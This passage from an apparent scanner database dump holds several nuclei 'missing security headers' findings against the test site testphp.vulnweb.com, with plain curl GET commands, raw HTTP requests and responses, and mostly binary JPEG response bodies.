�,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 912, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:24.481Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 913, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:24.682Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 914, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:24.883Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 915, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:25.097Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": 